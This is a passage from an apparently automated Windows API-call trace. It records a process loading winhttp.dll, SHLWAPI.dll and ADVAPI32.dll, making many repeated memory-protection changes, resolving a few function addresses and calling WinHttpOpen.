lpsz="winhttp.dll", cchLength=0xb | out: lpsz="winhttp.dll") returned 0xb [0111.120] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\winhttp.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0111.120] GetLastError () returned 0x7e [0111.120] SetLastError (dwErrCode=0x7e) [0111.147] SysReAllocStringLen (in: pbstr=0x6edde4*=0x0, psz="winhttp.dll", len=0xb | out: pbstr=0x6edde4*="winhttp.dll") returned 1 [0111.147] CharLowerBuffW (in: lpsz="winhttp.dll", cchLength=0xb | out: lpsz="winhttp.dll") returned 0xb [0111.147] LoadLibraryExW (lpLibFileName="winhttp.dll", hFile=0x0, dwFlags=0x0) returned 0x74610000 [0111.809] GetLastError () returned 0x0 [0111.809] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x74611170, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x4, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x20) returned 0x0 [0111.810] GetCurrentProcess () returned 0xffffffff [0111.810] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x74611170, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x20, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x4) returned 0x0 [0111.810] GetCurrentProcess () returned 0xffffffff [0111.810] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x746111a4, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x4, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x20) returned 0x0 [0111.810] GetCurrentProcess () returned 0xffffffff [0111.810] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x746111a4, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x20, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x4) returned 0x0 [0111.811] GetCurrentProcess () returned 0xffffffff [0111.811] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x746111dc, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x4, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x20) returned 0x0 [0111.811] GetCurrentProcess () returned 0xffffffff [0111.811] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x746111dc, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x20, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x4) returned 0x0 [0111.811] GetCurrentProcess () returned 0xffffffff [0111.811] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x746111e4, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x4, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x20) returned 0x0 [0111.811] GetCurrentProcess () returned 0xffffffff [0111.811] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x746111e4, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x20, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x4) returned 0x0 [0111.812] GetCurrentProcess () returned 0xffffffff [0111.812] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x746111ec, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x4, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x20) returned 0x0 [0111.812] GetCurrentProcess () returned 0xffffffff [0111.812] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x746111ec, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x20, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x4) returned 0x0 [0111.812] GetCurrentProcess () returned 0xffffffff [0111.812] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x74611200, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x4, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x20) returned 0x0 [0111.812] GetCurrentProcess () returned 0xffffffff [0111.813] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x74611200, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x20, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x4) returned 0x0 [0111.813] GetCurrentProcess () returned 0xffffffff [0111.813] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x74611204, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x4, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x20) returned 0x0 [0111.813] GetCurrentProcess () returned 0xffffffff [0111.813] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x74611204, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x20, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x4) returned 0x0 [0111.813] GetCurrentProcess () returned 0xffffffff [0111.813] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x74611224, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x4, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x20) returned 0x0 [0111.814] GetCurrentProcess () returned 0xffffffff [0111.814] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x74611224, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x20, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x4) returned 0x0 [0111.814] GetCurrentProcess () returned 0xffffffff [0111.814] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x74611268, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x4, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x20) returned 0x0 [0111.814] GetCurrentProcess () returned 0xffffffff [0111.814] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x74611268, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x20, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x4) returned 0x0 [0111.814] GetCurrentProcess () returned 0xffffffff [0111.814] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x74611280, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x4, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x20) returned 0x0 [0111.815] GetCurrentProcess () returned 0xffffffff [0111.815] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x74611280, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x20, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x4) returned 0x0 [0111.815] GetCurrentProcess () returned 0xffffffff [0111.815] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x74611288, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x4, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x20) returned 0x0 [0111.815] GetCurrentProcess () returned 0xffffffff [0111.815] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x74611288, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x20, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x4) returned 0x0 [0111.816] GetCurrentProcess () returned 0xffffffff [0111.816] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x74611290, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x4, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x20) returned 0x0 [0111.816] GetCurrentProcess () returned 0xffffffff [0111.816] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6eddcc*=0x74611290, NumberOfBytesToProtect=0x6eddd0, NewAccessProtection=0x20, OldAccessProtection=0x6ede04 | out: BaseAddress=0x6eddcc*=0x74611000, NumberOfBytesToProtect=0x6eddd0, OldAccessProtection=0x6ede04*=0x4) returned 0x0 [0111.817] GetProcAddress (hModule=0x74610000, lpProcName="WinHttpOpen") returned 0x746158b9 [0111.817] GetProcAddress (hModule=0x74610000, lpProcName="WinHttpOpenW") returned 0x0 [0111.817] GetProcAddress (hModule=0x74610000, lpProcName="WinHttpCloseHandle") returned 0x74612c01 [0111.818] GetProcAddress (hModule=0x74610000, lpProcName="WinHttpCloseHandleW") returned 0x0 [0111.818] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0xb5ec48 [0111.819] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ba4, cbMultiByte=11, lpWideCharStr=0x6ed760, cchWideChar=2047 | out: lpWideCharStr="SHLWAPI.dll") returned 11 [0111.819] SysReAllocStringLen (in: pbstr=0x6ee764*=0x0, psz="SHLWAPI.dll", len=0xb | out: pbstr=0x6ee764*="SHLWAPI.dll") returned 1 [0111.819] CharLowerBuffW (in: lpsz="SHLWAPI.dll", cchLength=0xb | out: lpsz="shlwapi.dll") returned 0xb [0111.819] LoadLibraryExA (lpLibFileName="SHLWAPI.dll", hFile=0x0, dwFlags=0x0) returned 0x772f0000 [0111.819] GetLastError () returned 0x0 [0111.819] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f1014, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x4, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x20) returned 0x0 [0111.820] GetCurrentProcess () returned 0xffffffff [0111.820] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f1014, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x20, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x4) returned 0x0 [0111.820] GetCurrentProcess () returned 0xffffffff [0111.820] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f10b0, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x4, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x20) returned 0x0 [0111.820] GetCurrentProcess () returned 0xffffffff [0111.820] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f10b0, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x20, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x4) returned 0x0 [0111.821] GetCurrentProcess () returned 0xffffffff [0111.821] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f10f8, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x4, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x20) returned 0x0 [0111.821] GetCurrentProcess () returned 0xffffffff [0111.821] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f10f8, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x20, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x4) returned 0x0 [0111.821] GetCurrentProcess () returned 0xffffffff [0111.821] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f110c, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x4, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x20) returned 0x0 [0111.821] GetCurrentProcess () returned 0xffffffff [0111.821] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f110c, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x20, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x4) returned 0x0 [0111.822] GetCurrentProcess () returned 0xffffffff [0111.822] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f111c, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x4, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x20) returned 0x0 [0111.822] GetCurrentProcess () returned 0xffffffff [0111.822] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f111c, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x20, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x4) returned 0x0 [0111.822] GetCurrentProcess () returned 0xffffffff [0111.822] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f1120, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x4, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x20) returned 0x0 [0111.823] GetCurrentProcess () returned 0xffffffff [0111.823] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f1120, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x20, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x4) returned 0x0 [0111.823] GetCurrentProcess () returned 0xffffffff [0111.823] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f1124, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x4, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x20) returned 0x0 [0111.823] GetCurrentProcess () returned 0xffffffff [0111.823] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f1124, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x20, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x4) returned 0x0 [0111.823] GetCurrentProcess () returned 0xffffffff [0111.823] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f1138, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x4, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x20) returned 0x0 [0111.824] GetCurrentProcess () returned 0xffffffff [0111.824] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f1138, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x20, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x4) returned 0x0 [0111.824] GetCurrentProcess () returned 0xffffffff [0111.824] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f11b8, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x4, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x20) returned 0x0 [0111.824] GetCurrentProcess () returned 0xffffffff [0111.824] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f11b8, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x20, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x4) returned 0x0 [0111.824] GetCurrentProcess () returned 0xffffffff [0111.824] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f11c0, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x4, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x20) returned 0x0 [0111.825] GetCurrentProcess () returned 0xffffffff [0111.825] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f11c0, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x20, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x4) returned 0x0 [0111.825] GetCurrentProcess () returned 0xffffffff [0111.825] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f11c8, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x4, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x20) returned 0x0 [0111.825] GetCurrentProcess () returned 0xffffffff [0111.825] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee750*=0x772f11c8, NumberOfBytesToProtect=0x6ee754, NewAccessProtection=0x20, OldAccessProtection=0x6ee788 | out: BaseAddress=0x6ee750*=0x772f1000, NumberOfBytesToProtect=0x6ee754, OldAccessProtection=0x6ee788*=0x4) returned 0x0 [0111.826] GetProcAddress (hModule=0x772f0000, lpProcName="StrRChrA") returned 0x772fccf5 [0111.826] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ba4, cbMultiByte=12, lpWideCharStr=0x6ed7ec, cchWideChar=2047 | out: lpWideCharStr="ADVAPI32.dll") returned 12 [0111.827] SysReAllocStringLen (in: pbstr=0x6ee7f0*=0x0, psz="ADVAPI32.dll", len=0xc | out: pbstr=0x6ee7f0*="ADVAPI32.dll") returned 1 [0111.827] CharLowerBuffW (in: lpsz="ADVAPI32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0111.827] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0111.827] GetLastError () returned 0x0 [0111.827] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x77711520, NumberOfBytesToProtect=0x6ee7e0, NewAccessProtection=0x4, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x20) returned 0x0 [0111.827] GetCurrentProcess () returned 0xffffffff [0111.828] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x77711520, NumberOfBytesToProtect=0x6ee7e0, NewAccessProtection=0x20, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x4) returned 0x0 [0111.828] GetCurrentProcess () returned 0xffffffff [0111.828] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x77711540, NumberOfBytesToProtect=0x6ee7e0, NewAccessProtection=0x4, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x20) returned 0x0 [0111.828] GetCurrentProcess () returned 0xffffffff [0111.828] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x77711540, NumberOfBytesToProtect=0x6ee7e0, NewAccessProtection=0x20, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x4) returned 0x0 [0111.828] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x7771175c, NumberOfBytesToProtect=0x6ee7e0, NewAccessProtection=0x4, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x20) returned 0x0 [0111.829] GetCurrentProcess () returned 0xffffffff [0111.829] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x7771175c, NumberOfBytesToProtect=0x6ee7e0, NewAccessProtection=0x20, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x4) returned 0x0 [0111.829] GetCurrentProcess () returned 0xffffffff [0111.829] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x77711768, NumberOfBytesToProtect=0x6ee7e0, NewAccessProtection=0x4, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x20) returned 0x0 [0111.829] GetCurrentProcess () returned 0xffffffff [0111.829] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x77711768, NumberOfBytesToProtect=0x6ee7e0, NewAccessProtection=0x20, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x4) returned 0x0 [0111.829] GetCurrentProcess () returned 0xffffffff [0111.830] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x777117b8, NumberOfBytesToProtect=0x6ee7e0, NewAccessProtection=0x4, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x20) returned 0x0 [0111.830] GetCurrentProcess () returned 0xffffffff [0111.830] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x777117b8, NumberOfBytesToProtect=0x6ee7e0, NewAccessProtection=0x20, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x4) returned 0x0 [0111.830] GetCurrentProcess () returned 0xffffffff [0111.830] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x777117bc, NumberOfBytesToProtect=0x6ee7e0, NewAccessProtection=0x4, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x20) returned 0x0 [0111.830] GetCurrentProcess () returned 0xffffffff [0111.830] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x777117bc, NumberOfBytesToProtect=0x6ee7e0, NewAccessProtection=0x20, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x4) returned 0x0 [0111.831] GetCurrentProcess () returned 0xffffffff [0111.831] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x777117c8, NumberOfBytesToProtect=0x6ee7e0, NewAccessProtection=0x4, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x20) returned 0x0 [0111.831] GetCurrentProcess () returned 0xffffffff [0111.831] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x777117c8, NumberOfBytesToProtect=0x6ee7e0, NewAccessProtection=0x20, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x4) returned 0x0 [0111.831] GetCurrentProcess () returned 0xffffffff [0111.831] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x777117d0, NumberOfBytesToProtect=0x6ee7e0, NewAccessProtection=0x4, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x20) returned 0x0 [0111.831] GetCurrentProcess () returned 0xffffffff [0111.832] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x777117d0, NumberOfBytesToProtect=0x6ee7e0, NewAccessProtection=0x20, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x4) returned 0x0 [0111.832] GetCurrentProcess () returned 0xffffffff [0111.832] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x7771180c, NumberOfBytesToProtect=0x6ee7e0, NewAccessProtection=0x4, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x20) returned 0x0 [0111.832] GetCurrentProcess () returned 0xffffffff [0111.832] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x7771180c, NumberOfBytesToProtect=0x6ee7e0, NewAccessProtection=0x20, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x4) returned 0x0 [0111.832] GetCurrentProcess () returned 0xffffffff [0111.832] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x7771182c, NumberOfBytesToProtect=0x6ee7e0, NewAccessProtection=0x4, OldAccessProtection=0x6ee814 | out: BaseAddress=0x6ee7dc*=0x77711000, NumberOfBytesToProtect=0x6ee7e0, OldAccessProtection=0x6ee814*=0x20) returned 0x0 [0111.833] GetCurrentProcess () returned 0xffffffff [0111.833] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ee7dc*=0x7771182c, NumberOfBytesToProtect=0x6ee7e0, 